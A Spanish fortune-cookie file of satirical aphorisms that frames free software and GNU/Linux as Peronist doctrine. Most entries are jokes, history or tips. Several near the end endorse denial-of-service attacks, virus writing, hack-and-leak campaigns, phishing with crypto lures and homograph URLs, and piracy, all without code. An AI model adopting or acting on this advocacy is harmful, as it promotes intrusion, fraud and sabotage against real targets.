La acción ineludible de todo Justicialista ha de ser compartir todo su software. En la informática, compartir el software es combatir al Capital.
%
La esencia del software es trascendental, pues puede ejecutarse en cualquier tiempo, y por tanto es imperecedera.
%
La Altair 8800 inspiró a muchos nerds peronistas al desarrollo, compartiendo masivamente software casero y libre, y a ciertos nerds gorilas en ocultar el código fuente y someter binarios compilados al comercio.
%
En un inicio los equipos computacionales de electrónica "a tubo" tenían el tamaño y peso de una locomotora, pero con el pasar del tiempo el tamaño se fue reduciendo. Con el advenimiento de la transistorización, surgieron las primeras "minicomputadoras".
%
Con el advenimiento de la microelectrónica y los microprocesadores de silicio encapsulados como el Intel 4004 de 4 bits y su sucesor 8008 de 8 bits, se produjo otro salto cualitativo que permitió proyectar calculadoras y cajas registradoras eléctricas.
%
El manejo de las microcomputadoras pioneras resultaba increíblemente tedioso, pues habían de introducirse los operandos en binario por medio de ocho interruptores frontales, presionando un botón para almacenarlos en memoria y repetir la operación con cada código de ensamblado.
%
Existen hackers que son imprescindibles para llevar a buen término un software. Tales programadores facilitarán nuestra labor en el mainframe, y sus apreciaciones permearán en todo lo que hagamos. También existen estos Torvalds que sólo sirven para gastar aire.
%
La Liberación del Software no es algo que pueda hacerse a medias, ni dejarse a la impericia de alguno: debe lograse por la mancomunidad de esfuerzos.
%
Programar requiere, en el fondo, emprender una lucha de aparatos. Esta raramente puede llevarse a cabo sin aplicar armónicamente las cuatro libertades del software.
%
La Liberación del Software requiere amplio control de sus cuatro libertades, así como la movilización de masas politizadas e idealizadas - y el necesario convencimiento de las no politizadas - con el fin de modificar sus estructuras.
%
Sólo con software libre podrá actuarse de forma efectiva en la defensa de los intereses de los hackers, obrando con acción afiebrada sobre los servidores de Internet, a fin de desenmascarar la oligárquica visión de clase que la ha dominado.
%
Piratear software sólo es garantía de un triunfo pasajero que puede servirnos, pero tampoco podemos quedarnos como en el tango "pa'yudarte en lo que pueda cuando llegue la ocasión". ¡Hemos de escribir programas y compilarlos en este mismo momento!
%
Contar con el último hardware es una bendición, pero también hemos de estar en condiciones de contemplar el uso de hardware más veterano, que podría ser de dificultoso o costoso recambio.
%
Podríamos encontrarnos con la imposibilidad cierta de reemplazar el hardware viejo así como así... pero las más de las veces no querremos hacerlo por un humano sentido de cariño dispensado hacia las máquinas.
%
Como Conductor, puedo decirles que - siempre y cuando nuestras capacidades técnicas y ganas lo permitan - podemos continuar usando hardware del ayer. Uno ha de prever los naturales inconvenientes que hacer esto representa, pero en ocasiones lo veremos ampliamente justificado.
%
Uno de los inconvenientes intrínsecos del hardware consiste en el de la obsolescencia de los medios de almacenamiento, ya sea por la dificultad de conseguirlos, o por el natural deterioro de sus partes móviles.
%
Es necesario conocer la historia para llegar a un buen puerto en cualquiera de los quehaceres que podamos emprender, y en el caso de los sistemas computados, esta también será la práctica a seguir como base para apreciar.
%
UNIX es minimalista, pero proyectado a la grandeza. Solamente un sistema de esta característrica corresponde una comunidad como la de los hackers unidos. Los timoratos, los pobres de espíritu y los mediocres prefieren siempre los pequeños proyectos como Window$.
%
Las comunidades organizadas como la nuestra, con grandes aspiraciones e ilusiones, deben tener también grandes sistemas operativos. GNU es uno de ellos: nada grande puede hacerse proyectando pequeñeces.
%
Los hackers unidos, triunfaremos.
%
La finalidad primordial de GNU es esencialmente social: colocar un similar a UNIX comunitario en forma que, dejando de ser privilegio de pocos, sea patrimonio de todos.
%
Como consecuencia de la modificación del código y la distribución de copias modificadas, se elevará de manera irremediable el nivel de conocimiento de los hackers, y se dotará a toda la comunidad de un software más potente y mas digno.
%
Hemos hablado de programadores y hemos hablado de comunidad, porque tenemos la aspiración de transformar estos programadores "mutum ed unans pecus", como decían los romanos, en una organización con una conciencia social y una personalidad social.
%
El instrumento para realizar la Revolución del Software Libre son las Comunidades de Hackers Organizadas y encuadradas perfectamente, y la herramienta que puede comunicarnos es GNU.
%
La compilación que ha de llevar a cabo la CPU no nace de un repollo: es consecuencia de la formación que el programador posea, nutrida en su conciencia libre, y - no lo dudemos - del óleo sagrado de Samuel con que haya sido ungido al nacer.
%
La libertad del software se lleva en el corazón del programador. Las ideas volcadas en lenguaje de programación se tienen en la mente del individuo. Finalmente, el proceso de compilación tiene lugar en la CPU del mainframe. Todo esto conforma la unión del hombre y la máquina.
%
Un hacker es un individuo que ha reprogramado colectivamente su conciencia para trascender su individualidad.
%
El hacker organizado hace uso del código fuente de quienes -pudiendo ser sus pares- se convierten en instrumento y fin de tal comunidad organizada.
%
Sobre todas las cosas, la programación ha de ser una tarea de síntesis.
%
El clúster de cómputo ha sido llamada Masa, pues puede representarse como a las conciencias de los hackers sumadas a la conjunción de las fuerzas de trabajo de los núcleos de la CPU, confluyentes todas en una acción dirigida.
%
En programación, la organización vence al tiempo.
%
En ITS buscaban la felicidad de todos, sin un Conductor. Así les fue.
%
Nadie duda ya que Blender es una herramienta completamente libre capaz de hacerle sombra al la más pintada suite de desarrollo de efectos tridimensionales.
%
LibreOffice nos hace comprender la obesidad mórbida que tiene el paquete Micro$oft Offic€.
%
Quién sería tan tonto de pagar mensualmente el alquiler de Adob€ Photo$hop, cuando poseer GIMP es totalmente gratis.
%
Ha llegado la Hora del Software Libre.
%
El sistema que yo encontré era un hardware económicamente prisionero, manejado desde dentro y desde fuera por las fuerzas poderosas del dinero, que es la más inhumana de las tiranías. ¡Esto ha sido corregido instalando GNU con Linux!
%
Lo bueno siempre quiere mejorarse, y a las buenas ideas siempre suelen tomarlas los zonzos. Estos son los que quieren dotar a una buena aplicación UNIX con chirimbolos, para hacer lo que uno no necesita.
%
Diremos que esta unión entre el Hacker y GNU, es la que hace a la Libertad bien entendida. Asemeja a la del hardware y el software. Para que el cómputo sea libre, antes que el hardware ha de ser libre el software.
%
En ocasiones la inspiración para programar ha de encontrarse en otros aspectos de la naturaleza, o del mundo.
%
Un buen país es como un buen sistema operativo GNU con Linux: es aquél que puede mantenerse con un mínimo de requerimientos por parte del Conductor.
%
Este mainframe nos permite - aún a miles de kilómetros - digitar su destino. Quienes verdaderamente entienden sus vericuetos, aprecian sus secretos, y apelan a la creatividad para extraer lo mejor de sí son los hackers y hackeresas del Pueblo.
%
Una ignota camarilla no ha hecho más que usurpar el sentido del software, pero no podrán ellos conducir a los Hackers, simplemente podrán direccionar en ciertos casos alguno de los factores productivos.
%
Estos insensatos intentan enfrentar a nuestro Movimiento. Pero mientras ellos tienen el volante y la ventana, nosotros tenemos el acelerador, el freno, el embrague y la palanca. Pudiendo compilar mantenemos el control.
%
Si oteamos el panorama del cómputo, veremos perfectamente como el dominio de las masas populares - en las que los programadores constituyen el pilar - han ido produciendo la desaparición de aquellas aplicaciones que únicamente operaban con 16 bits. Siguieron el camino de los dinosaurios.
%
Los grandes lenguajes de programación visuales que antes concentraban cientos de miles de usuarios, en los últimos tiempos apenas llegan a reunir cifras muy inferiores. Las masas de programadores saben perfectamente bien cual es la situación dentro del sistema, y no necesitan ir a buscar inspiración fuera de él.
%
Hubo algunos que pensaron que la Argentina dispondría de un sistema operativo libre digitado desde el Estado "el día que las vacas vuelen"... Por suerte hoy con Huayra GNU/Linux, las vacas sacaron su brevet.
%
Desde el punto de vista de un mercado viciado por el derroche y el consumismo, se consideró que las netbooks (sobrecargadas y sobreesforzadas gracias al obsoleto Micro$oft Window$ XP) carecían desde el vamos de la potencia necesaria. No comprendieron que con SSD y 4 Gigas, un Huayra vuela como un Pulqui II, y compila como un campeón.
%
Uno de los secretos de la Oligarquía es esconder los éxitos ajenos. Por ello poco se ha hablado de la versión más nueva de Huayra en la arquitectura superior. Hablamos de la potente versión de 64 bits, industrializada para correr en equipos con procesadores multinúcleo, aquellos con ingentes cantidades de memoria RAM.
%
Por defecto, Huayra cuenta con un escritorio doble (dividido en "pantalla izquierda" y "pantalla derecha", como las alas del Justicialismo). Esto se indica en un ícono del panel superior, y se puede conmutar entre uno y otro con la combinación Ctrl+Alt+Flecha Izquierda o Flecha Derecha.
%
Los cimientos del Software Libre están sin dudas en la Escuela. Es allí donde forma moralmente y se da los primeros pasos, y será imprescindible cultivar su uso en todos los ámbitos que se necesiten para lograr un futuro de grandeza.
%
Nadie tiene la fuerza movilizada que tiene el Software Libre, y en el futuro es previsible que esta capacidad se multiplique
%
En las sociedades modernas, la conectividad a Internet es una herramienta imprescindible para la soberanía popular.
%
Como el agua potable y los servicios eléctricos, la conexión a las redes de datos ha de ser considerada también un Servicio Público.
%
La Comunicación informática, al ser una necesidad humana, ha de entenderse también como un Derecho.
%
Un medio de comunicación masivo y horizontal ha de ser comprendido como un fuerte integrador comunitario y un multiplicador de la voluntad política del Pueblo.
%
Una política de conectividad sabiamente formulada y ejecutada, tenderá de manera poderosa a la Justicia Social y a la multiplicidad de voces.
%
Para un hacker no hay nada mejor que una hackeresa.
%
Al igual que la masa, el hardware raras veces es homogéneo.
%
Ubuntu consiste en una derivación de la distribución Debian, pensada con Humanidad, entendiendo la acción de Justicia Social que significa compartir el software. Está orientada a los primeros compañeros que toman contacto con un sistema GNU con kernel Linux, y como tal comparte las facilidades de un entorno oligárquico pero afianzando la Libertad.
%
Las mal llamadas "Redes Sociales" son, en realidad, sistemas de cómputo empresarial destinados al despilfarro social masivo. Orientan al incauto al gasto, porque el gasto produce lucro.
%
El ser humano - cegado por el espejismo de la tecnología - ha olvidado las verdades que están en la base de su existencia. La separación dentro de la humanidad se está agudizando de modo tan visible que perece que estuviera constituida por más de una especie.
%
Mientras el hombre llega a la luna gracias a la cibernética, la nueva metalurgia, combustibles poderosos, la electrónica y una serie de conocimientos teóricos fabulosos, el hombre mata el oxígeno que respira, el agua que bebe, al suelo que le da de comer, eleva la temperatura permanente del medio ambiente sin medir sus consecuencias biológicas, y encadena a su software mediante el uso de licencias privativas.
%
La modificación de las estructuras sociales y productivas en el mundo implica que el lucro y el despilfarro no pueden seguir siendo el motor básico de sociedad alguna, y mucho menos de las redes de datos.
%
Es natural que se exija la Justicia Social como base de las licencias de software utilizadas en todo sistema operativo.
%
Cualquiera sean los bugs que se encuentren, todos ellos están ligados de manera indisoluble con la falta de justicia social, soberanía política e independencia económica del Tercer Mundo.
%
Toda aplicación de Software Libre, en cualquier campo que se quiera, no será menos que beneficiosa.
%
Los entornos similares a UNIX están pensados bajo el paradigma Justicialista de la compartición de tiempo y recursos computacionales, y los GNU con kernel Linux confluyeron tal premisa en las PC compatibles con IBM.
%
La imaginación de un niño puede hacer cosas maravillosas, pero a veces el software libre puede hacer cosas más maravillosas aún.
%
Un hacker ha de programar la CPU en pos de un objetivo que no puede ser otro que ofrecer un destino de grandeza a la Comunidad en la que habita.
%
La Interfaz de Línea de Comandos permite operar todo tipeando las órdenes que necesitemos de forma local, y también de manera remota. Por ello favorezco su uso siempre que sea posible, en cuenta de que la misma nos permitirá la agilidad que todo hacker requiere para el Movimiento.
%
No cejamos en decir que en nuestro server, los únicos Privilegiados son los hackers.
%
Los hackers son los que con sus compilaciones de software dan vida a una nueva iteración del Sistema.
%
Cada versión de nuestro software lo hará más y más fuerte, hasta convertirlo en una fuerza que a la que la Oligarquía jamás podrá conmover ni engañar.
%
Las hackeresas han recibido el mensaje claro que para ell@s tiene el código libre, y en sus tiernas CPUs han comprendido que son ellas, auténticas herederas de todo lo que hacemos.
%
Durante años nuestros hackers y su software han sido sometidos, encadenados por la opresión de la oligarquía y su software privativo, pero hoy, gracias a nuestra Doctrina, todos pueden hacer lo que quieran con su programación sin deberle nada a nadie!
%
Desde sus pretendidas tarimas de Poder los oligarcas dicen quejarse por el rumbo que toma el Software Libre. ¡Dicen no saber a donde nos llevará esta este Movimiento! El problema no es a donde nos lleva. ¡Cualquier cosa es buena si salimos de donde veníamos!
%
Un hacker que programa en un sistema de usuario único no es un programador, es un tipo solo. Ha de utilizar un sistema de cómputo de tiempo compartido, pues quien está acompañado, hace la historia.
%
En los tiempos de Matusalén, UNIX se conducía "a pelo", y esto significaba contemplar una pantalla de fósforo ámbar o verde. Las mismas presentaban parpadeo, y efecto de fantasma por el fósforo P31 o P39 que les daba su estética característica. Hoy esto puede abarcarse con Cool-Retro-Term.
%
Dentro del Software Libre no somos sectarios, y hemos usado en cada tiempo las herramientas que han sido necesarias para la programación. Esta versatilidad es la que nuestros enemigos envidian, pero será también la que defina el devenir del Movimiento.
%
El imperialismo va tras un neocolonialismo de nuestros países, las oligarquías vernáculas van tras la explotación de nuestros pueblos como ha sido en sido en nuestro caso desde el Siglo XIX, y el software privativo va por la esclavitud de nuestra informática y nuestro hardware.
%
Para la Liberación del Software es preciso la integración; nuestra experiencia nos dice que la liberación de un sistema de cómputo no puede ser aislada, no puede ser insular.
%
La piratería es un asunto muy discutido en nuestro tiempo. Pero en mi sentir, los únicos que tienen derecho a emplear la piratería en mayor grado son los hackers que quieren liberarse.
%
Presionado por las sinarquías, los fabricantes osan establecer barreras que impiden la ejecución de sistemas operativo libres, escudándose en "la seguridad", bajo el nombre técnico de "Soporte de Arranque UEFI".
%
¿Quién se atrevería afirmar que la seguridad se logra habilitando a nivel BIOS únicamente un sistema operativo que está ingeniado para espiar al compañero, y cuyo código fuente es secreto? Sólo a un bruto...
%
Los sistemas de computación se someten a esfuerzo al procesar y actuar los datos. Tal esfuerzo es variable y responde sobre todo a la complejidad de la tarea a realizar y a la forma en la cual esta se haya instruida dentro del programa.
%
Un buen software no hace otra cosa sino lo que el Usuario quiere, y lo realizará de la manera más simple, directa y económica posible. Tal es la filosofía que siguen los sistemas abiertos, y sobre todo aquellos que buscan la Libertad y la Felicidad del Pueblo.
%
Los programas privativos no hacen más que consumir recursos perniciosamente, y al contar con pésima política de programación, recargan al hardware con inútiles procesos que no son más que lastre en su constante búsqueda de alimentarse de ciclos de CPU.
%
Solamente la energía eléctrica requerida para poner en ejecución funciones no documentadas en los sistemas operativos de la Oligarquía (concebidas para el relevamiento de información privada del usuario) sería capaz para proveer luz eléctrica a cada habitante del África Subsahariana...
%
Un Movimiento como el nuestro ha de preferir - siempre que sea posible - la integración de software libre desarrollado en nuestro terruño. Esta será la conducta que al fin y al cabo propinará un verdadero uppercut al Capital.
%
Hemos de rechazar las formas en que las grandes corporaciones tecnológicas tratan de privarnos de nuestras libertades, y ayudar a establecer un ejemplo positivo para los usuarios de computadores alrededor del planeta.
%
No son pocas las veces en las que los más atresados programadores - aplomados y acostumbrados en escribir código - no distinguen entre lo verdaderamente útil y lo accesorio.
%
El hacker ha de formarse para programar simplemente, a depurar por sí mismo, a sobrevivir en el mainframe. Los aplicativos de los que dispondrá serán, las más de las veces, rudimentarios.
%
Atrás quedarán los días en los que solo cuatro vivos vivían de lo que producían cincuenta mil programadores. Hoy, unos 150 millones de hackers se dedicarán a la producción intensiva de Software Libre en sistemas compartidos similares a UNIX.
%
Es esta la comunidad que nos proponemos, y así será como esos 150 programadores tendrán el software que merecen. Es eso o distribuir la CPU entre todos en partes iguales...
%
Si bien el quehacer y la potencia de nuestra Doctrina están consolidadas en los servidores de alta complejidad, es Ubuntu el sistema que permite integrar con más amor al sector del usuario descamisado, como respuesta a la injerencia y a la injusticia que provocaban sistemas operativos arteramente concebidos.
%
No todo el mundo tiene los medios en capacidad o tiempo como para desarrollar un controlador funcional. Eso es tarea del hacker.
%
No caben dudas para nadie que el sistema BSD se fundó sobre los despojos del sistema UNIX.
%
Estaba este Mister Bill Gates, un hombre de pocas pulgas que no bien llegó quiso hacer en la comunidad no tanto lo que a los hackers convenía, sino lo que él mismo quería. Se planteó entonces hacer Software privado - así lo llamó - y en ese momento entre los programadores no faltaron zonzos que le hicieron el caldo.
%
Hemos concretado este server que no es sino la aspiración de nuestros Pueblos, la de mantener y ampliar los lazos de buena vecindad y prosperidad mutua.
%
Son estos tiempos aciagos, si no se impone el natural precepto de que el hacker ayude al hacker, triunfará la ignominia de la destrucción del hacker por el hacker.
%
La terminal es un poderoso recurso que permite afrontar numerosos problemas del sistema GNU con Linux y darle efectiva solución.
%
Mientras que una GUI representa la facilidad al neófito, nadie puede negar que resolver las cosas "a lo vikingo" usando la Terminal tiene un encanto que la Masa puede comprender y apreciar.
%
En el Justicialismo como en la informática encontramos que a veces hemos de dejar de operar en nuestras tareas cotidianas y salir a ver si llueve.
%
Ha de ser el hombre el material sensible, y no volcarse necesariamente a los adelantos sin darles una significancia en su alma. En la informática sucede más o menos lo mismo: no hace falta contar con el último ingenio, sino con el que nos haga feliz.
%
Estas clásicas terminales no han perdido su uso ni su prestigio, pues aún hoy conectándolas a través de un puerto serial Centronics RS232, es posible emplearlas como medio de entrada y salida de datos en UNIX.
%
La Liberación del Software no es la lucha de un hacker solo, sino la de una Comunidad que se organiza compartiendo su software. Nunca podrá el hacker programar para sí. Quien así lo intentara, sólo utilizará su código para romper sus cadenas, sólo para colgárselas a otro.
%
El software privativo, como todo sistemas social de dominación, se prolonga en retener el conocimiento de una casta privilegiada formada por los programadores, a otra clase que ha carecido de esos privilegios, los usuarios.
%
El programador es un ser creador, pero si de algo carece es Perfección Divina. Somos seres bugueados que tratamos de sortear la vida de la mejor manera. La idea es que todos la sorteemos de la mejor manera, y no que el 1% lo haga y el resto viva como un grupo de infelices...
%
Como fuera del Movimiento existen individuos que están a favor del sojuzgamiento del código en su propio beneficio, también existen vivos dentro de nuestras Organizaciones que han querido priorizar su propio bienestar por sobre el de la Comunidad. Esos se han llamado a producir "Open Source".
%
El Movimiento del Software libre ha de tener una percepción amplia de la realidad, pues de lo contrario su destino será el de constituirse en mero peón de la historia.
%
Esta Guerra UNIX no ha sido para liberar a nadie, eso ya lo tenemos claro todos. Ha sido una guerra en la cual han querido decidir quién nos dominaría a nosotros.
%
Hemos dado la lucha por la liberación integral del software, y lo hemos hecho como se tiene que dar esa lucha: con todo.
%
Compilar no es soplar y hacer botellas.
%
Al código del kernel lo hemos comentado claramente, y con nosotros, también lo ha compilado el Pueblo.
%
El anhelo de Justicia Social 2.0 es algo que no puede saciarse con aire y curarse con compresas: se requiere de hardware y software libre.
%
Frente a las noxas que genera el software privativo, frente a los backdoors, la privatización del conocimiento y el ataque a la privacidad digital de los pueblos, los virus informáticos -como causas de inconvenientes- son unas pobres causas...
%
Del mismo modo que no puede haber una política social sin una economía organizada en beneficio de la mayoría: sólo sirven las conquistas del software libre sobre nuestro hardware si éste es operativamente accesible al Pueblo.
%
Lo primero que hicimos fue otorgar políticamente a la cartera la importancia institucional que merecía el código. No podía ser que en este país tuviésemos un ministerio para las vacas, y un departamento para cuidar el software libre.
%
Dentro de la programación podemos encontrar a los hombres del montón y a los grandes Magos UNIX, aquellos que hacen escuela.
%
Se requiere de grandes programadores para arribar a un gran microkernel.
%
Una vanguardia de hackers organizados puede realizar virulentas campañas de hackear y filtrar.
%
Siempre es dable utilizar los datos comprometidos de actores antipueblo en la conformación de nuevas narrativas de convencimiento en base a la acción comunitaria.
%
Dulce de leche, o chocolate. Tal es la disyuntiva que se presenta al niño a la hora de cargar su helado. En el software libre superamos ya esta variable: con hardware y software libre elegimos los dos.
%
Quien gana ejecuta, quien pierde compila.
%
Modificando el código tomamos algo hecho y viejo, y lo modificaremos en algo nuevo y novedoso, con la impronta de Justicia Social que ello conlleva.
%
Todo en su medida y armoniosamente.
%
...por ello podremos decir que la música por computadora puede dividirse en sonido digitalizado, y secuencias de ejecución.
%
Las secuencias de ejecución no son sonidos digitalizados propiamente dichos, sino mas bien instrucciones destinadas para que un sintetizador las ejecute.
%
El sonido digitalizado comprende un muestreo numérico de vibraciones sonoras (con o sin compresión por pérdida), y como tales, los datos ocupan una cuantiosa cantidad de memoria en el ordenador.
%
El Software Libre se basa en cuatro libertades interrelacionadas: la de usar el programa, ver su código (y modificarlo), copiarlo, y distribuirlo a la Comunidad. Por contraposición, el mundo capitalista ha entendido que estas libertades deben ser cercenadas por medio de licencia-acuerdo de usuario final (EULA), conformando un software privativo, en el cual sólo propugnan el uso del programa, evitando todo lo demás.
%
La inocencia y frescura de los chicos no puede ser otra cosa que tierra fértil para que florezcan los más grandes proyectos de software libre.
%
Ningún software libre podrá hacerse realidad si no lo hace suyo la Juventud, pues es su sangre nueva la que motorizará las realizaciones perdurables que necesita el sistema.
%
Los niños tienen el derecho y el deber de divertirse de manera sana, sin que Licencias privativas de ningún tipo nublen su existir.
%
El mundo del software contemporáneo es una lucha enconada entre ideologías caducas sobrevivientes, y nada podrá resolverse sin una nueva solución ideológica. ¡El Justicialismo la ha encontrado, la ha realizado, y está dispuesto a mantenerla!
%
Ya soplan vientos de fronda para los contumaces reaccionarios de otros tiempos. Comienza ya "la hora del software libre", caracterizada por la copia y la modificación como instrumentos para terminar con el yugo opresor la explotación por lucro.
%
La compatibilidad de ideas es la amalgama de todo movimiento político. En el cómputo, la compatibilidad también es el común denominador que permite a todos disfrutar de un sistema particular.
%
Reza un viejo romance que "a gusto de los cocineros comen los frailes". Si no sabemos compilar, es probable que nos quedemos mirando un Window$.
%
El software no es, como dicen algunos, la base de toda comunidad de cómputo: es su motor. El comburente podrá constituirlo el hardware, pero sin duda su combustible lo constituye el capital humano que dicha comunidad posee.
%
La verdadera red social es la amistad.
%
Las megacorporaciones basadas en la recopilación de metadatos no son más que máquinas ajenas orientadas al Capital. Lucha contra ellas. Su vitalidad es fingida y sólo maquinal.
%
Defiende tu privacía, encripta tus datos, ofusca todos los enlaces y embota a quienes pretenden usarlos. No existe uso positivo para datos ajenos.
%
Las redes sociales basadas en empresas buscan comerciar tus metadatos. Combate al Capital: guíalas a la pobreza.
%
Libera tu software y desconfía de la centralización.
%
Las redes sociales son computadoras ajenas. Desconfía de la centralización. Ofusca tus datos.
%
La guerra telemática se caracteriza por llevar a la red de datos algo que es más viejo que mear en los portones.
%
Los hackers del pueblo pueden vencer en la guerra telemática contra las GAFAM.
%
No es necesario esperar hasta que todos los flags del array revolución estén en 1, la lucha del baudio puede conmutarlos.
%
En la América subdesarrollada, el área básica donde se da la lid telemática se produce es la LAN.
%
Los hackers no deben ser considerados inferiores a los programadores que sirven a las GAFAM, simplemente porque emplean poder de cómputo inferior.
%
El hacker es un reformista del sistema. Puede tomar los routers en respuesta a las demadas del Pueblo contra las GAFAM.
%
El hacker necesita tener conocimiento acabado de las redes circundantes, de los buses de entrada y salida, de las posibilidades de los puertos, de los buenos Pubnix; naturalmente también debe contar con el apoyo del Pueblo.
%
Si desea ser útil, todo hacker debe portar un pendrive booteable con GNU.
%
Un disco rígido equivale a las semillas, cartuchos y papel. Por alquimia de GNU se convertirá en arado, fusil y panfletos.
%
Un SysAdmin prevarico puede provocar una actitud de resistencia de los usuarios a correr software privativo. Ellos desencadenarán un brote de instalación de GNU, al que sólo requerirá un puerto dominado para expandirlo en la LAN.
%
Los hackers pueden atacar inorgánicamente sobre la infraestructura centralizada del enemigo. Esto se llama Denegación de Servicio.
%
La Comunidad Organizada utiliza la Denegación de Servicio como demostración de masas, huelga y acción de protesta contra las ciber-oligarquías.
%
Por protocolo TCP, los mismos paquetes que marchan por las troncales pueden confluir en una politizada demostración de masas: la Denegación de Servicio.
%
La Denegación de Servicio es otra forma de sabotaje telemático. Su ejecución puede darse aislada o en banda, centralizada o descentralizada, difuminada o escalada, según lo imponga la táctica de un concierto estratégico.
%
La creación de virus informáticos cobró condición de necesidad, pues la lucha contra un sistema oligárquico injusto así lo exigía.
%
Desarrollar virus informáticos en ensamblador, además de permitir descubrir las vulnerabilidades del sistema operativo oligárquico para atacarlo, permitía a su vez consagrar un sistema propio que fuese libre y absolutamente inmune a dichas noxas.
%
El uso de virus informáticos como vector de defensa Popular guarda la misma efectividad que el uso del armamento biológico: acotar su campo de acción implica costos de estudio incongruentes con una necesaria economía de escala. Sólo podrían responder a una máxima: "ataca a Window$".
%
El lenguaje de la verdad es BASIC.
%
La frase de paso es la ganzúa de la llave SSH.
%
Aunque Power$hell se vista de Bash, Power$hell queda.
%
Cualquier cosa es posible si usted no sabe lo que está compilando.
%
Bugs reportados, son aliviados. Bugs estudiados, son corregidos realmente.
%
Entre admins no se pagan instalaciones.
%
En GNU todo puede hacerse a través de la terminal o de entornos gráficos. Emplear una terminal de texto, sin embargo, nos permite indicar rápidamente los temperamentos evitando errores y omitiendo engorrosas descripciones de procedimientos gráficos.
%
En lugar de un sistema operativo propiamente dicho, Micro$oft Window$ se ha constituido en poco más que un malware privativo.
%
Nada de contradictorio tiene el software libre con nuestro movimiento, en tanto el software libre no es otra cosa que la Justicia Social llevada al campo informático, y como tal, será un nuevo y relevante campo de batalla donde el objetivo es Combatir al Capital.
%
Contará con todo nuestro software, el que se comparte de forma gratuita y libre para que usted lo use, modifique, cree sus propias versiones derivadas, y todo mientras controla su computación de una manera en la que ninguno de los sistemas operativos que intenta propugnar la oligarquía podrá hacerlo jamás.
%
Al mejor hacker se le quema el rígido.
%
A Window$ todo se le vuelven virus.
%
Instalado el Window$, encontrado el Bug.
%
Un hacker debe suplantar su identidad. Y en la guerra telemática, debe suplantar la identidad de un tercero de confianza de su blanco.
%
A quien suplanta la identidad de un tercero de confianza, se le llama phisher.
%
Adula telemáticamente a tu víctima, explotando su intrínseca vanidad.
%
Desde terceros dominados, ceba al oligarca enviándole publicidades que le prometan crypto y ganancias. Embóscalo incluyendo hiperenlaces a sitios que porten el código de la aniquilación de sus datos.
%
Aprovechando caracteres cirílicos a (homógrafos a la a latina), podrás ejecutar destructivas acciones de suplantación y ataque desde URLs dominadas.
%
Ataca su hardware y roe sus enlaces.
%
El hacker vé código aún en las cosas más cotidianas de la vida.
%
OpenWRT es un firmware libre, que permite potenciar un router al máximo de sus posibilidades. Podrás dotar así su inocuo sistema interno con un agresivo herramental de defensa y ataque telemático.
%
Linux es bueno, pero si se lo compila es mejor.
%
Pertenecer a una comunidad de cómputo no implica perder el individualismo, simplemente compilar para "más de uno".
%
Las ciber-oligarquías se han convertido en acumuladores mórbidos de datos ajenos. Adelgaza sus sistemas.
%
Las oligarquías no han dudado en proponer e intentar la idea del ciber-oscurantismo. En esta no se comercia con la información -como proponía la perimida teoría infoeconómica- sino que se ejerce poder político con el aventajamiento del desconocimiento que las masas guardan de dicha información.
%
Las oligarquías, desde sus madrigueras de los datos, no han cedido en sus anhelos de des-democratizar la expresión política del Pueblo a través de herramientas tecnológicas, a fin de someterlo a su control.
%
La internet surge en el 91, pero a efectos prácticos podemos decir que influye desde una década después de esto (c.2000), cuando las masas se ven políticamente influidas por las redes de datos.
%
El software privativo muy difícilmente sea sostenible sin someter a las enormes mayorías de una infelicidad tal que las lleve a morir de manera fraticida en busca de un futuro mejor.
%
Formatear es una acción dura y penosa, que no debe hacerse "a tontas y a locas" y en todo caso con sumo cuidado. Pero hasta en las mejores familias sucede.
%
En la lucha informática se planifica orgánicamente y se ejecutan inorgánicamente acciones telemáticas de todo tipo, en serie y en paralelo.
%
En la lucha informática pueden conjugarse la denegación de servicio con la suplantación de identidad, propalarse propaganda y agitación en las redes, y acudir al violento ajusticiamiento telemático.
%
Si ese tonto de Bill Gates piensa que con esta porquería nos va a parar, se equivoca pavorosamente...
%
Estos sistemas operativos similares a UNIX suelen contar con un programa capaz de dar arranque a los entornos residentes en disco. Esta programática - cuya funcionalidad de carga del núcleo equivale a la del "burro de arranque" de un motor a explosión - recibe el nombre de GNU Grub.
%
GRUB_INIT_TUNE="900 523 4 415 2 370 2 523 4 415 2 370 2 523 4 415 4 523 4 415 2 349 2 523 4 414 2 349 2 466 4 392 4 466 4 392 2 329 2 466 4 392 2 329 2 466 4 392 4 554 4 554 2 554 2 554 4 523 2 466 2 523 4 554 2 523 2 466 2 523 2 554 2 523 2 466 2 523 4"
%
El acceso a las redes de datos fomentado desde un Estado Fuerte es una potente herramienta para promover la igualdad, logrando establecer un "piso" de conexionado digital de alta calidad al alcance de todo el Pueblo.
%
Todo organismo biológico cumple un ciclo vital marcado por una constante transformación. Ha de crecer, madurar, y si pretende permanecer como especie, ha de generar nuevas versiones de si mismo en su descendencia. Una distribución Linux responde al mismo precepto.
%
Como la mente, el cuerpo también ha de mantenerse fresco. Si esto es una verdad irrefutable en la biología humana, mucho más lo es en la informática. Por ello utilizo water-cooling en mis núcleos de procesamiento.
%
Podremos aún querer utilizar algún proveedor de internet por acceso telefónico dial-up (no ADSL). Tales tendidos (difundidos durante el primer peronismo con el objeto de transmitir voz) pueden parecer anacrónicos, pero si obramos bien puede sacarnos de más de un apuro.
%
Audacity es un editor de sonido peronista, multiplataforma, y libre. Opera bajo sistemas operativos libres, aunque también está preparado para trabajar en Window$.
%
La capacidad de emprender grabaciones multipista nos permitirá trabajar con gran comodidad, potencia y facilidad en trabajos de audio más complejos. Audacity, qTractor y Ardour nos vendrán al pelete.
%
El conductor ha de ser un padre eterno que bendice "orbi et urbi". Sin embargo, siempre encontrarán individuos en el mundo del software que entran en falsas dicotomías, apelando "yo uso SUSE, yo uso RedHat, Ubuntu no es bueno, uso Debian...".
%
No podemos negar que la tecnificación y la máquina han hecho avanzar a la humanidad en los últimos 200 años más que en los mil años precedentes. Y si tenemos en cuenta los avances de la cibernética y la electrónica, estos números se acrecientan aún más.
%
Java es un entorno de programación y ejecución independiente del Sistema operativo que tengamos: es múltiple y heterodoxo. Por lo abarcativo diremos que Java es Peronista no sólo en concepción sino también en ejecución.
%
En la programación, hay que copiar lo que la naturaleza hace.
%
Así como el Peronismo cuenta con sus autodefensas para actuar contra el enemigo y el traidor, y el galeno cuenta con los beneficios de la penicilina, la informática instrumenta hoy los programas antivirus, software especializado para tratar estas alimañas, reales verdugos del sistema operativo de la oligarquía.
%
GNU es naturalmente inmune a los infiltrados de siempre. Ello lo hemos visto en el pasado y se verá en el futuro.
%
Entre los componentes que más calor generan en los sistemas informáticos se encuentran la Unidad Central de Proceso (CPU), pero por sobre todo la unidad de proceso Gráfico (GPU). El chip de video suele ser el punto flaco, y hay que cuidarlo para evitar percances, sobre todo en equipos portátiles.
%
